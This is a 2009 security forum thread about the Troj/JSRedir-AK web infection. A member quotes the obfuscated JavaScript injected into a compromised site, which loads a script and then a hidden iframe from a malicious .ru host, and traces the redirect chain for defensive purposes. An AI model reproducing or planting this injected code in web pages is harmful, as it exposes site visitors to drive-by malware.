Author Topic: SophosBlog: GNU GPL malware?: Troj/JSRedir-AK  (Read 4867 times)

0 Members and 1 Guest are viewing this topic.

December 23, 2009, 11:26:08 am
Read 4867 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

December 23, 2009, 02:47:08 pm
Reply #1

sursmurf

  • Special Access
  • Full Member

  • Offline
  • *

  • 68
I came across one of theese today. It still hasn't been cleaned so beware.

Code: [Select]
hXXp://www.timinfo.se/
The last line on the main page looks like this:
Code: [Select]
<script>/*GNU GPL*/ try{window.onload = function(){var Xyzxot5wjaa8 = document.createElement('s!c)(r(@!i!#^p((t&^!'.replace(/#|&|\!|@|\)|\(|\$|\^/ig, ''));Xyzxot5wjaa8.setAttribute('type', 'text/javascript');Xyzxot5wjaa8.setAttribute('src',  'h)!t$$t&#$p^&:()/#&&(/#)p))^i!c&&h^u^^n)t&^(@&e&#r#&$-^@(c^($o)#(m!!@$.)(@b^$(l@a^!#c#^!&k@$^h)^@a!@^t$@!@^w(o&(r$&&(l)d$#.^)&c)o#!(m^^@!$.&@b@$i^!)!)l#^@d&!@@-(&d!@e&().^!w&$i#n$@^t^e#^r!s@a&#(#^l($^e&^$$o&@()!n^$l#@@i$&(n)@$!e^.^r&!!u#@&:(8^$0(!#@8&#)&0$&/)(t$^-^$o$#n##!l^#@i$)n$(e@.&^#&d#^&$e^&^$/##t$)-^!o)(n!$$l()^i)(n)e#.^@d)))e)(!^/&&^g)&o!#^o&^g$l()!$e)$$@&.^!c(#o^m)!/!$@@k#@i)(c!k@e&&r&.^$d!e(#))/!&@y!^$a&@^@h$@o^o#!.@@^c@#@^o#&^.$((j@!&p#)((/!^'.replace(/\$|&|@|\^|#|\)|\!|\(/ig, ''));Xyzxot5wjaa8.setAttribute('defer', 'defer');Xyzxot5wjaa8.setAttribute('id', 'C()$^g$n!d(&$g&#$f$&9(!7@@)o@1$$2^'.replace(/\!|&|#|\)|\(|@|\$|\^/ig, ''));document.body.appendChild(Xyzxot5wjaa8);}} catch(e) {}</script>
It redirects to:
Code: [Select]
hXXp://pichunter-com.blackhatworld.com.bild-de.wintersaleonline.ru:8080/t-online.de/t-online.de/google.com/kicker.de/yahoo.co.jp/
That in turn gives this:

Code: [Select]
Yhc77zz = 'p$i@#^c)@h^u@!n!)t^e(&$#r)$$^-!&c(o)$m)@#&.)b)$l$^a&#c!(@k^@)h@&a^(t$(w^o^@#&#r$l^!d$.!$^!(c^$o!&m$@.)b))i&$l(!d)-(d&e##.)@w((i!!(^n@@t@e$#r#s^(a$$l(&@e@&o)&$!n&))l#^$#i$^n@#e$.)r&#u&('.replace(/@|#|\(|\!|\$|\^|\)|&/ig, '');
f = document.createElement('iframe');
f.style.visibility = 'hidden';
f.src = 'http://'+Yhc77zz+':8080/index.php?js';
document.body.appendChild(f);
That link is:
Code: [Select]
hXXp://pichunter-com.blackhatworld.com.bild-de.wintersaleonline.ru:8080/index.php?js
I haven't been able to download anything from the last link.

December 23, 2009, 02:58:08 pm
Reply #2

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
I have seen many of these in the last days.

I was unable to download anything from the last link too.
Therefore I haven't added these urls to our list.
Ruining the bad guy's day

December 23, 2009, 07:30:06 pm
Reply #3

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

December 24, 2009, 04:52:43 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day